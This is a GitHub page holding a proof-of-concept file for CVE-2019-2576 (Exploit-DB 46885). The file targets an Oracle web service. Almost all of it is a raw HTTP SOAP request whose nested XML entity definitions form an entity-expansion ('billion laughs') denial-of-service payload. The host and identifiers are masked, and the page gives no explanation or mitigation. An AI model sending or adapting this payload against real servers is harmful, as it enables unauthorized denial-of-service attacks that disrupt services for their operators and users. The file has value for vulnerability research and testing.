Oracle_CTF_Web_XML_Entity_Exploit/Exploit-POC at master · omurugur/Oracle_CTF_Web_XML_Entity_Exploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
EDB-ID: 46885 | CVE-2019-2576
Exploit-DB Link  : https://www.exploit-db.com/exploits/46885
CVE-Mitre Link   : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2576

POST /EBS_ASSET_HISTORY_OPERATIONS HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "getCampaignHistory"
Content-Length: 16
Host: ****
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close


<!DOCTYPE foo [<!ENTITY ha "Ha !"> <!ENTITY ha2 "&ha; &ha; &ha; &ha; &ha; &ha; &ha; &ha;"> <!ENTITY ha3 "&ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2;"> <!ENTITY ha4 "&ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3;"> <!ENTITY ha5 "&ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4;"> <!ENTITY ha6 "&ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5;"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ebs="http://www.****" xmlns:ave="http://www.****&ha6;rk">

                <soapenv:Header/>

                <soapenv:Body>

                               <ebs:EbsRetrieveWebChatHistoryRequest>

                                               <ave:RequestHeader>

                                                               <ave:RequestId>

                                                                              <ave:GUID>***</ave:GUID>

                                                               </ave:RequestId>

                                                               <ave:CallingSystem>***</ave:CallingSystem>

                                                               <ave:BusinessProcessId>***</ave:BusinessProcessId>

                                               </ave:RequestHeader>

                                               <ebs:RequestBody>

                                                               <ebs:msisdn>****</ebs:msisdn>

                                               </ebs:RequestBody>

                               </ebs:EbsRetrieveWebChatHistoryRequest>

                </soapenv:Body>

</soapenv:Envelope>